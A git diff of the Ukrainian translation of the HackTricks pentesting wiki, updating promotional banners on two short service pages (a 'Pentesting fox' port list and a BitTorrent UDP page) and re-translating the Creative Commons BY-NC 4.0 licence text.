diff --git a/1911-pentesting-fox.md b/1911-pentesting-fox.md index feade1c8c..b98c560b3 100644 --- a/1911-pentesting-fox.md +++ b/1911-pentesting-fox.md @@ -1,30 +1,31 @@ -# 1911 - Pentesting fox +# 1911 - Тестування на проникнення лисиці + +{% hint style="success" %} +Вивчайте та практикуйте взламування AWS:[**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взламування GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію рекламовану на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} -And more services: +І більше сервісів: -ubiquiti-discover udp "Ubiquiti Networks Device" +ubiquiti-discover udp "Пристрої Ubiquiti Networks" -dht udp "DHT Nodes" +dht udp "Вузли DHT" 5060 udp sip "SIP/" ![](<.gitbook/assets/image (273).png>) -![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (3).png>) +![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (3).png>) InfluxDB @@ -38,16 +39,17 @@ InfluxDB ![](<.gitbook/assets/image (341).png>) +{% hint style="success" %} +Вивчайте та практикуйте взламування AWS:[**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взламування GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію рекламовану на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} diff --git a/6881-udp-pentesting-bittorrent.md b/6881-udp-pentesting-bittorrent.md index e4036d58e..7868d3768 100644 --- a/6881-udp-pentesting-bittorrent.md +++ b/6881-udp-pentesting-bittorrent.md @@ -1,13 +1,14 @@ +{% hint style="success" %} +Вивчайте та практикуйте хакінг AWS: [**Школа хакінгу HackTricks для експертів червоної команди AWS (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте хакінг GCP: [**Школа хакінгу HackTricks для експертів червоної команди GCP (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (Експерт HackTricks AWS Red Team)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити **рекламу вашої компанії на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакінг-прийоми, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} diff --git a/LICENSE.md b/LICENSE.md index a866f000d..5246fddde 100644 --- a/LICENSE.md +++ b/LICENSE.md @@ -1,63 +1,64 @@ +{% hint style="success" %} +Вивчайте та практикуйте хакінг AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте хакінг GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію рекламовану на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub.
+{% endhint %} -Ліцензія Creative Commons
Авторське право © Карлос Полоп 2021. За винятком випадків, коли інформація зовнішніх авторів була скопійована в книгу, текст на HACK TRICKS Карлоса Полопа ліцензований за Ліцензією Creative Commons Із Зазначенням Авторства-Некомерційна 4.0 Міжнародна (CC BY-NC 4.0). +Ліцензія Creative Commons
Авторське право © Карлос Полоп 2021. Крім випадків, коли інше вказано (зовнішня інформація, скопійована в книгу, належить оригінальним авторам), текст на HACK TRICKS від Карлоса Полопа ліцензовано за Ліцензією Creative Commons Із Зазначенням Авторства-Некомерційна 4.0 Міжнародна (CC BY-NC 4.0). Ліцензія: Ліцензія Creative Commons Із Зазначенням Авторства-Некомерційна 4.0 Міжнародна (CC BY-NC 4.0)
-Ліцензія у Зрозумілій Формі: https://creativecommons.org/licenses/by-nc/4.0/
-Повні Юридичні Умови: https://creativecommons.org/licenses/by-nc/4.0/legalcode
+Ліцензія для людей: https://creativecommons.org/licenses/by-nc/4.0/
+Повний текст правових умов: https://creativecommons.org/licenses/by-nc/4.0/legalcode
Форматування: https://github.com/jmatsushita/Creative-Commons-4.0-Markdown/blob/master/licenses/by-nc.markdown
# creative commons # Ліцензія Creative Commons Із Зазначенням Авторства-Некомерційна 4.0 Міжнародна -Корпорація Creative Commons ("Creative Commons") не є юридичною фірмою і не надає юридичні послуги або юридичні консультації. Розповсюдження громадських ліцензій Creative Commons не створює відносин адвокат-клієнт або іншого характеру. Creative Commons надає свої ліцензії та пов'язану інформацію на "як є" основі. Creative Commons не надає жодних гарантій щодо своїх ліцензій, будь-якого матеріалу, ліцензованого відповідно до їх умов та умов або будь-якої пов'язаної інформації. Creative Commons відмовляється від усіх відповідальностей за збитки, що виникають в результаті їх використання в максимально можливому обсязі. +Корпорація Creative Commons ("Creative Commons") не є юридичною фірмою і не надає юридичні послуги або консультації. Розповсюдження громадських ліцензій Creative Commons не створює відносин адвокат-клієнт або іншого характеру. Creative Commons надає свої ліцензії та пов'язану інформацію на "як є" основі. Creative Commons не надає жодних гарантій щодо своїх ліцензій, будь-якого матеріалу, ліцензованого відповідно до їх умов і умов або будь-якої пов'язаної інформації. Creative Commons відмовляється від усіх відповідальностей за збитки, що виникають в результаті їх використання в максимально можливому обсязі. -## Використання Громадських Ліцензій Creative Commons +## Використання громадських ліцензій Creative Commons -Громадські ліцензії Creative Commons надають стандартний набір умов, які творці та інші правовласники можуть використовувати для поширення оригінальних творів авторства та іншого матеріалу, що підпадає під авторські права та певні інші права, вказані в громадській ліцензії нижче. Наведені нижче вимоги мають інформаційний характер, не є вичерпними і не є частиною наших ліцензій. +Громадські ліцензії Creative Commons надають стандартний набір умов, які творці та інші правовласники можуть використовувати для поширення оригінальних творів авторства та іншого матеріалу, що підпадає під авторське право та певні інші права, вказані в громадській ліцензії нижче. Наведені вище розгляди носять інформаційний характер, не є вичерпними і не є частиною наших ліцензій. -* __Вимоги для ліцензіарів:__ Наші громадські ліцензії призначені для використання тими, хто має повноваження надавати громадське дозвіл на використання матеріалу способами, які інакше обмежені авторськими правами та певними іншими правами. Наші ліцензії є невідкликними. Ліцензіарі повинні прочитати та зрозуміти умови та умови ліцензії, яку вони обирають перед її застосуванням. Ліцензіарі також повинні забезпечити всі права, необхідні перед застосуванням наших ліцензій, щоб громадськість могла використовувати матеріал, як очікувалося. Ліцензіарі повинні чітко позначати будь-який матеріал, який не підпадає під ліцензію. До цього входить інший матеріал, ліцензований за ліцензією CC, або матеріал, використаний за винятком або обмеженням авторських прав. [Додаткові вимоги для ліцензіарів](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensors). +* __Розгляди для ліцензіарів:__ Наші громадські ліцензії призначені для використання тими, хто має право надавати громадське дозвіл на використання матеріалу способами, які інакше обмежені авторським правом та певними іншими правами. Наші ліцензії є невідкликними. Ліцензарі повинні прочитати та зрозуміти умови та умови ліцензії, яку вони обирають, перед застосуванням її. Ліцензарі також повинні забезпечити всі необхідні права перед застосуванням наших ліцензій, щоб громадськість могла повторно використовувати матеріал, як очікувалося. Ліцензарі повинні чітко позначати будь-який матеріал, який не підпадає під ліцензію. До цього входить інший матеріал, ліцензований за ліцензією CC, або матеріал, використаний за винятком або обмеженням авторського права. [Більше розглядів для ліцензіарів](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensors). -* __Вимоги для громадськості:__ Використовуючи одну з наших громадських ліцензій, ліцензіар надає громадськості дозвіл на використання ліцензованого матеріалу за визначеними умовами. Якщо дозвіл ліцензіара не є необхідним з будь-якої причини - наприклад, через будь-яке застосовне виключення або обмеження авторських прав - то це використання не регулюється ліцензією. Наші ліцензії надають лише дозволи згідно з авторськими правами та певними іншими правами, які ліцензіар має повноваження надавати. Використання ліцензованого матеріалу може бути обмеженим з інших причин, включаючи те, що інші мають авторські або інші права на матеріал. Ліцензіар може зробити спеціальні запити, наприклад, попросити позначити або описати всі зміни. Хоча це не є обов'язковим за нашими ліцензіями, вас закликають поважати ці запити, де це розумно. [Додаткові вимоги для громадськості](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensees). +* __Розгляди для громадськості:__ Використовуючи одну з наших громадських ліцензій, ліцензар надає громадськості дозвіл на використання ліцензованого матеріалу за визначеними умовами. Якщо дозвіл ліцензара не є необхідним з будь-якої причини - наприклад, через будь-яке застосовне виняток або обмеження авторського права - то це використання не регулюється ліцензією. Наші ліцензії надають лише дозволи згідно з авторським правом та певними іншими правами, які ліцензар має право надавати. Використання ліцензованого матеріалу може бути обмеженим з інших причин, включаючи те, що інші мають авторські або інші права на матеріал. Ліцензар може висувати спеціальні вимоги, наприклад, прохання позначати або описувати всі зміни. Хоча це не є обов'язковим за нашими ліцензіями, вас закликають поважати ці вимоги, де це розумно. [Більше розглядів для громадськості](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensees). # Ліцензія Creative Commons Із Зазначенням Авторства-Некомерційна 4.0 Міжнародна -Використовуючи Ліцензовані Права (визначені нижче), Ви приймаєте і погоджуєтеся бути зв'язаними умовами цієї Ліцензії Creative Commons Із Зазначенням Авторства-Некомерційна 4.0 Міжнародна ("Громадсьна Ліцензія"). На той час, як цю Громадсьну Ліцензію можна тлумачити як контракт, Вам надаються Ліцензовані Права в обмін на Ваше прийняття цих умов та умов, і Ліцензор надає Вам такі права в обмін на переваги, які Ліцензор отримує від надання Ліцензованого Матеріалу доступним за цими умовами та умовами. +Використовуючи Ліцензовані Права (визначені нижче), Ви приймаєте і погоджуєтеся бути зв'язаними умовами цієї Ліцензії Creative Commons Із Зазначенням Авторства-Некомерційна 4.0 Міжнародна ("Громадська Ліцензія"). На той час, як цю Громадську Ліцензію можна тлумачити як контракт, Вам надаються Ліцензовані Права в обмін на Ваше прийняття цих умов та умов, і Ліцензор надає Вам такі права в обмін на переваги, які Ліцензор отримує від надання Ліцензованого Матеріалу доступним за цими умовами та умовами. ## Розділ 1 - Визначення. -a. __Адаптований Матеріал__ означає матеріал, що підпадає під Авторські та Схожі Права, який походить від або базується на Ліцензованому Матеріалі та в якому Ліцензований Матеріал перекладено, змінено, упорядковано, трансформовано або інакше модифіковано таким чином, що вимагає дозволу від Ліцензора за Авторськими та Схожими Правами. Для цілей цієї Громадсьної Ліцензії, де Ліцензований Матеріал є музичним твором, виконанням або звукозаписом, Адаптований Матеріал завжди створюється там, де Ліцензований Матеріал синхронізовано в часовому відношенні з рухомим зображенням. +a. __Адаптований Матеріал__ означає матеріал, що підпадає під Авторське Право та Схожі Права, який походить від або базується на Ліцензованому Матеріалі та в якому Ліцензований Матеріал перекладено, змінено, упорядковано, трансформовано або іншим чином змінено таким чином, що вимагає дозволу від Авторського Права та Схожих Прав, які належать Ліцензору. Для цілей цієї Громадської Ліцензії, де Ліцензований Матеріал є музичним твором, виконанням або звукозаписом, Адаптований Матеріал завжди створюється там, де Ліцензований Матеріал синхронізовано в часовому відношенні з рухомим зображенням. -b. __Ліцензія Адаптера__ означає ліцензію, яку Ви застосовуєте до Ваших Авторських та Схожих Прав у Ваших внесках до Адаптованого Матеріалу відповідно до умов цієї Громадсьної Ліцензії. +b. __Ліцензія Адаптера__ означає ліцензію, яку Ви застосовуєте до Ваших Авторських та Схожих Прав у Ваших внесках до Адаптованого Матеріалу відповідно до умов цієї Громадської Ліцензії. -c. __Авторські та Схожі Права__ означають авторські та/або схожі права, тісно пов'язані з авторськими правами, включаючи, без обмежень, виконавські, трансляційні, звукозаписні та Права на Бази Даних Sui Generis, незалежно від того, як ці права позначені або категоризовані. Для цілей цієї Громадсьної Ліцензії права, вказані в Розділі 2(b)(1)-(2), не є Авторськими та Схожими Правами. +c. __Авторське Право та Схожі Права__ означають авторське право та/або схожі права, що тісно пов'язані з авторським правом, включаючи, без обмежень, виконавське, мовленнєве, звукозапис та Права на Бази Даних Sui Generis, незалежно від того, як ці права позначені або категоризовані. Для цілей цієї Громадської Ліцензії права, вказані в Розділі 2(b)(1)-(2), не є Авторськими Правами та Схожими Правами. -d. __Ефективні Технологічні Заходи__ означають ті заходи, які, у відсутності належної влади, не можуть бути обійдені в рамках законів, що виконують обов'язки згідно зі Статтею 11 Договору ВОІС з авторських прав, прийнятого 20 грудня 1996 року, та/або схожих міжнародних угод. +d. __Ефективні Технологічні Заходи__ означають ті заходи, які, у відсутності належної влади, не можуть бути обійдені в рамках законів, що виконують обов'язки згідно зі Статтею 11 Договору ВОІПО про авторське право, прийнятого 20 грудня 1996 року, та/або схожих міжнародних угод. -e. __Винятки та Обмеження__ означають добросовісне використання, справедливу угоду та/або будь-який інший виняток або обмеження до Авторських та Схожих Прав, які застосовуються до Вашого використання Ліцензованого Матеріалу. +e. __Винятки та Обмеження__ означають добросовісне використання, справедливу угоду та/або будь-яке інше виняток або обмеження до Авторських Прав та Схожих Прав, які застосовуються до Вашого використання Ліцензованого Матеріалу. -f. __Ліцензований Матеріал__ означає художню або літературну роботу, базу даних або інший матеріал, до якого Ліцензор застосував цю Громадсьну Ліцензію. +f. __Ліцензований Матеріал__ означає художню або літературну роботу, базу даних або інший матеріал, до якого Ліцензор застосував цю Громадську Ліцензію. -g. __Ліцензовані Права__ означають права, надані Вам відповідно до умов цієї Громадсьної Ліцен -## Розділ 2 - Обсяг. +g. __Ліцензовані Права__ означають права, надані Вам відповідно до умов цієї Громадської Ліцензії, які обмежені всіма Авторськими Правами та Схожими Правами, які заст +## Розділ 2 – Обсяг. -а. ___Ліцензійна угода.___ +а. ___Надання ліцензії.___ -1. Згідно з умовами цієї Публічної Ліцензії, Ліцензіар надає Вам світову, безкоштовну, несубліцензійну, неексклюзивну, невідкликну ліцензію на використання Ліцензованих Прав у Ліцензованому Матеріалі для: +1. Згідно з умовами цієї Публічної Ліцензії, Ліцензіар надає Вам світову, безкоштовну, несубліцензовану, неексклюзивну, невідкликну ліцензію на використання Ліцензованих Прав у Ліцензованому Матеріалі для: A. відтворення та Поширення Ліцензованого Матеріалу повністю або частково лише для некомерційних цілей; та @@ -65,29 +66,29 @@ B. створення, відтворення та Поширення Адапт 2. __Винятки та обмеження.__ Для уникнення сумнівів, де застосовуються Винятки та Обмеження до Вашого використання, ця Публічна Ліцензія не застосовується, і Вам не потрібно дотримуватися її умов та умов. -3. __Термін.__ Термін дії цієї Публічної Ліцензії вказаний у Розділі 6(a). +3. __Термін.__ Термін дії цієї Публічної Ліцензії визначено в Розділі 6(a). -4. __Медіа та формати; дозволені технічні модифікації.__ Ліцензіар дозволяє Вам використовувати Ліцензовані Права у всіх медіа та форматах, які відомі на даний момент або будуть створені у майбутньому, та робити технічні модифікації, необхідні для цього. Ліцензіар відмовляється від будь-якого права або повноваження забороняти Вам робити технічні модифікації, необхідні для використання Ліцензованих Прав, включаючи технічні модифікації, необхідні для обхідних заходів ефективних технологічних засобів. З метою цієї Публічної Ліцензії, просто виконання модифікацій, дозволених цим Розділом 2(a)(4), ніколи не призводить до створення Адаптованого Матеріалу. +4. __Медіа та формати; дозволені технічні модифікації.__ Ліцензіар дозволяє Вам використовувати Ліцензовані Права у всіх медіа та форматах, які відомі на даний момент або будуть створені у майбутньому, та робити технічні модифікації, необхідні для цього. Ліцензіар відмовляється від будь-якого права або повноваження забороняти Вам робити технічні модифікації, необхідні для використання Ліцензованих Прав, включаючи технічні модифікації, необхідні для обхідних ефективних технологічних заходів. З метою цієї Публічної Ліцензії, просто виконання модифікацій, дозволених цим Розділом 2(a)(4), ніколи не призводить до створення Адаптованого Матеріалу. -5. __Одержувачі віддалених даних.__ +5. __Одержувачі вниз по ланцюжку.__ -A. __Пропозиція від Ліцензіара - Ліцензований Матеріал.__ Кожен одержувач Ліцензованого Матеріалу автоматично отримує пропозицію від Ліцензіара використовувати Ліцензовані Права відповідно до умов цієї Публічної Ліцензії. +A. __Пропозиція від Ліцензіара – Ліцензований Матеріал.__ Кожен одержувач Ліцензованого Матеріалу автоматично отримує пропозицію від Ліцензіара використовувати Ліцензовані Права відповідно до умов цієї Публічної Ліцензії. -B. __Відсутність обмежень для віддалених одержувачів.__ Ви не можете пропонувати або накладати будь-які додаткові або відмінні умови або застосовувати будь-які ефективні технологічні заходи до Ліцензованого Матеріалу, якщо це обмежує використання Ліцензованих Прав будь-яким одержувачем Ліцензованого Матеріалу. +B. __Відсутність обмежень вниз по ланцюжку.__ Ви не можете пропонувати або накладати будь-які додаткові або відмінні умови або застосовувати будь-які ефективні технологічні заходи до Ліцензованого Матеріалу, якщо це обмежує використання Ліцензованих Прав будь-яким одержувачем Ліцензованого Матеріалу. -6. __Відсутність реклами.__ Ніщо в цій Публічній Ліцензії не становить або не може тлумачитися як дозвіл на твердження або натяк на те, що Ви є, або що Ваше використання Ліцензованого Матеріалу є пов'язаним з, або спонсорованим, підтриманим або наданим офіційним статусом Ліцензіаром або іншими особами, які мають отримати атрибуцію, як передбачено у Розділі 3(a)(1)(A)(i). +6. __Відсутність реклами.__ Ніщо в цій Публічній Ліцензії не становить або не може тлумачитися як дозвіл на твердження або натяк на те, що Ви є, або що Ваше використання Ліцензованого Матеріалу є пов'язаним з, або спонсорованим, підтриманим або наданим офіційним статусом Ліцензіаром або іншими особами, призначеними для отримання атрибуції, як передбачено в Розділі 3(a)(1)(A)(i). b. ___Інші права.___ -1. Моральні права, такі як право на недоторканість, не ліцензуються за цією Публічною Ліцензією, а також публічність, конфіденційність та/або інші схожі особисті права; однак, наскільки це можливо, Ліцензіар відмовляється від будь-яких таких прав, які належать Ліцензіару, в обмеженому обсязі, необхідному для того, щоб дозволити Вам використовувати Ліцензовані Права, але не більше. +1. Моральні права, такі як право на недоторканість, не ліцензуються за цією Публічною Ліцензією, а також публічність, конфіденційність та/або інші схожі особисті права; однак, наскільки це можливо, Ліцензіар відмовляється від будь-яких таких прав, які належать Ліцензіару, в обсязі, необхідному для того, щоб дозволити Вам використовувати Ліцензовані Права, але не більше. -2. Патентні та торговельні марки не ліцензуються за цією Публічною Ліцензією. +2. Патентні та торговельні маркові права не ліцензуються за цією Публічною Ліцензією. -3. На скільки це можливо, Ліцензіар відмовляється від права стягувати роялті від Вас за використання Ліцензованих Прав, як безпосередньо, так і через колективне управління в рамках будь-якої добровільної або відступної статутної або обов'язкової ліцензійної схеми. У всіх інших випадках Ліцензіар виразно залишає за собою право стягувати такі роялті, включаючи випадки, коли Ліцензований Матеріал використовується не для некомерційних цілей. +3. На скільки це можливо, Ліцензіар відмовляється від права на збір роялті від Вас за використання Ліцензованих Прав, як безпосередньо, так і через колективне управління в рамках будь-якої добровільної або обов'язкової ліцензійної схеми. У всіх інших випадках Ліцензіар виразно залишає за собою право на збір таких роялті, включаючи випадки, коли Ліцензований Матеріал використовується не для некомерційних цілей. -## Розділ 3 - Умови ліцензії. +## Розділ 3 – Умови ліцензії. -Ваше використання Ліцензованих Прав виражено підлягає наступним умовам. +Ваше використання Ліцензованих Прав виражено підпорядковується наступним умовам. а. ___Атрибуція.___ @@ -95,73 +96,74 @@ b. ___Інші права.___ A. зберігати наступне, якщо воно надано Ліцензіаром разом з Ліцензованим Матеріалом: -i. ідентифікацію авторів Ліцензованого Матеріалу та будь-яких інших осіб, які мають отримати атрибуцію, будь-яким розумним способом, запропонованим Ліцензіаром (включаючи псевдонім, якщо він визначений); +i. ідентифікацію авторів Ліцензованого Матеріалу та будь-яких інших осіб, призначених для отримання атрибуції, будь-яким розумним способом, запропонованим Ліцензіаром (включаючи псевдонім, якщо він призначений); -ii. авторське право; +ii. зазначення авторських прав; -iii. повідомлення, яке посилається на цю Публічну Ліцензію; +iii. зазначення, що посилається на цю Публічну Ліцензію; -iv. повідомлення, яке посилається на відмову від гарантій; +iv. зазначення, що посилається на відмову від гарантій; -v. URI або гіперпосилання на Ліцензований Матеріал настільки, наскільки це є реально можливим; +v. URI або гіперпосилання на Ліцензований Матеріал настільки, наскільки це реально; B. вказувати, якщо Ви внесли зміни до Ліцензованого Матеріалу та зберігати вказівку на будь-які попередні зміни; та -C. вказувати, що Ліцензований Матеріал ліцензований за цією Публічною Ліцензією, та включати текст цієї Публічної Ліцензії або URI або гіперпосилання на цю Публічну Ліцензію. +C. вказувати, що Ліцензований Матеріал ліцензовано за цією Публічною Ліцензією, та включати текст або URI або гіперпосилання на цю Публічну Ліцензію. -2. Ви можете задовольнити умови Розділу 3(a)(1) будь-яким розумним способом на основі носія, засобів та контексту, в якому Ви Поширюєте Ліцензований Матеріал. Наприклад, можливо розумно задовольнити умови, надавши URI або гіперпосилання на ресурс, який містить необхідну інформацію. +2. Ви можете задовольнити умови в Розділі 3(a)(1) будь-яким розумним способом на основі носія, засобів та контексту, в якому Ви Поширюєте Ліцензований Матеріал. Наприклад, можливо розумно задовольнити умови, надавши URI або гіперпосилання на ресурс, який містить необхідну інформацію. -3. Якщо цього вимагає Ліцензіар, Ви повинні видалити будь-яку інформацію, яка вимагається Розділом 3(a)(1)(A) настільки, наскільки це є реально можливим. +3. Якщо цього вимагає Ліцензіар, Ви повинні видалити будь-яку інформацію, яка вимагається Розділом 3(a)(1)(A) настільки, наскільки це реально. 4. Якщо Ви Поширюєте Адаптований Матеріал, який ви створили, Ліцензія Адаптера, яку Ви застосовуєте, не повинна перешкоджати одержувачам Адаптованого Матеріалу дотримуватися цієї Публічної Ліцензії. -## Розділ 4 - Права на базу даних Sui Generis. +## Розділ 4 – Спеціальні права баз даних Sui Generis. -Де Ліцензовані Права включають Права на базу даних Sui Generis, які застосовуються до Вашого використання Ліцензованого Матеріалу: +Де Ліцензовані Права включають Спеціальні права баз даних Sui Generis, які застосовуються до Вашого використання Ліцензованого Матеріалу: а. для уникнення сумнівів, Розділ 2(a)(1) надає Вам право видобувати, використовувати, відтворювати та Поширювати всі або значну частину вмісту бази даних лише для некомерційних цілей; -b. якщо Ви включаєте всі або значну частину вмісту бази даних у базу даних, в якій у Вас є Права на базу даних Sui Generis, то база даних, в якій у Вас є Права на базу даних Sui Generis (але не її окремі вміст), є Адаптованим Матеріалом; та +b. якщо Ви включаєте всі або значну частину вмісту бази даних в базу даних, в якій у Вас є Спеціальні права баз даних Sui Generis, то база даних, в якій у Вас є Спеціальні права баз даних Sui Generis (але не її окремі вміст), є Адаптованим Матеріалом; та -c. Ви повинні дотримуватися умов Розділу 3(a), якщо Ви Поширюєте всі або значну частину вмісту бази даних. +c. Вам необхідно дотримуватися умов Розділу 3(a), якщо Ви Поширюєте всі або значну частину вмісту бази даних. Для уникнення сумнівів, цей Розділ 4 доповнює, а не замінює Ваші обов'язки за цією Публічною Ліцензією, де Ліцензовані Права включають інші Авторські та Схожі Права. -## Розділ 5 - Відмова від гарантій та обмеження відповідальності. +## Розділ 5 – Відмова від гарантій та обмеження відповідальності. -а. __Якщо Ліцензіар окремо не взяв на себе зобов'язання, наскільки це можливо, Ліцензіар пропонує Ліцензований Матеріал "як є" та "як доступний", і не надає жодних гарантій будь-якого виду щодо Ліцензованого Матеріалу, чи то виражених, підразуміваних, законних або інших. Це включає, без обмежень, гарантії щодо назви, товарної придатності, придатності для певної мети, відсутності порушень, відсутності прихованих або інших дефектів, точності, або наявності або відсутності помилок, незалежно від того, чи відомі вони або можуть бути виявлені. Де відмови від гарантій не дозволяються повністю або частково, ця відмова може не застосовуватися до Вас.__ +a. __Крім випадків окремого погодження Ліцензіара, наскільки це можливо, Ліцензіар пропонує Ліцензований Матеріал "як є" та "як доступний", і не надає жодних висловлень або гарантій будь-якого виду щодо Ліцензованого Матеріалу, чи то виражених, підразуміваних, законних або інших. Це включає, без обмежень, гарантії щодо назви, товарної придатності, придатності для певної мети, відсутності порушень, 